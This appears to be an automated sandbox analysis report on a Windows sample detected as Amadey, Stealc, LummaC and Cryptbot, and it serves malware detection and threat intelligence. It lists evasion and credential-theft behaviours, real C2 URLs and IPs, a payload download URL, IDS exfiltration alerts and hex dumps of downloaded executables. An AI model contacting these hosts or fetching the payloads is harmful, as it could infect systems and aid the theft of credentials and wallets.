Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561240
MD5: 642a88e4846a4148e7a4bed5a1f988a2
SHA1: 1e02b5843578247066ca9017b345ecb511bdc3ba
SHA256: 7b98dd28b55e84671d52943a82b7919967c4c825ac6bd69c2dfdadfccb986747
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://31.41.244.11/files/rnd.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Lumma55[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 00000001.00000003.1716893441.0000000005190000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 8e3ce0163b.exe.8052.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Lumma55[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Lumma55[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49986 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:50030 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3f81b82714.exe, 0000001D.00000003.2804023257.0000000004A90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: firefox.exe Memory has grown: Private usage: 1MB later: 179MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49807 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49837 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49835 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49861 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49889 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49900 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50028 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50040 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49790 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49808 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49784 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49784 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49790 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49808 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49850 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49853 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49853 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49859 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49859 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49796 -> 104.21.93.105:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49969 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49969 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49938 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49938 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49887 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49930 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49986 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49986 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49816 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49816 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49994 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50021 -> 104.21.33.116:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50030 -> 104.21.33.116:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 34
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:09 GMTContent-Type: application/octet-streamContent-Length: 1897984Last-Modified: Fri, 22 Nov 2024 21:33:07 GMTConnection: keep-aliveETag: "6740f893-1cf600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 2b 0a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 62 7a 6d 64 74 64 00 60 1a 00 00 d0 30 00 00 56 1a 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 6a 75 71 71 6f 68 00 10 00 00 00 30 4b 00 00 06 00 00 00 ce 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 22:21:18 GMTContent-Type: application/octet-streamContent-Length: 1881088Last-Modified: Fri, 22 Nov 2024 21:39:39 GMTConnection: keep-aliveETag: "6740fa1b-1cb400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 39 1c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 64 72 68 72 78 6a 70 00 20 1a 00 00 b0 30 00 00 16 1a 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 66 6b 72 67 6a 61 73 00 10 00 00 00 d0 4a 00 00 04 00 00 00 8e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 92 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
